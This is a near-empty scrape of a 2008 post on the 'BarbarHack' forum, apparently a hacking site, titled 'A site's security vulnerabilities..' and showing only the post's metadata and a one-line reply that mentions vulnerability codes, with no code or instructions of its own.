BarbarHack

Welcome to the BarbarHack Web Site....!
 
 

A site's security vulnerabilities..

Author: Admin

Post count: 127
Registration date: 20/03/08

Post subject: A site's security vulnerabilities..   Sat March 22, 2008 3:43 pm

Reply: all of a site's vulnerability codes - 11-24-2007




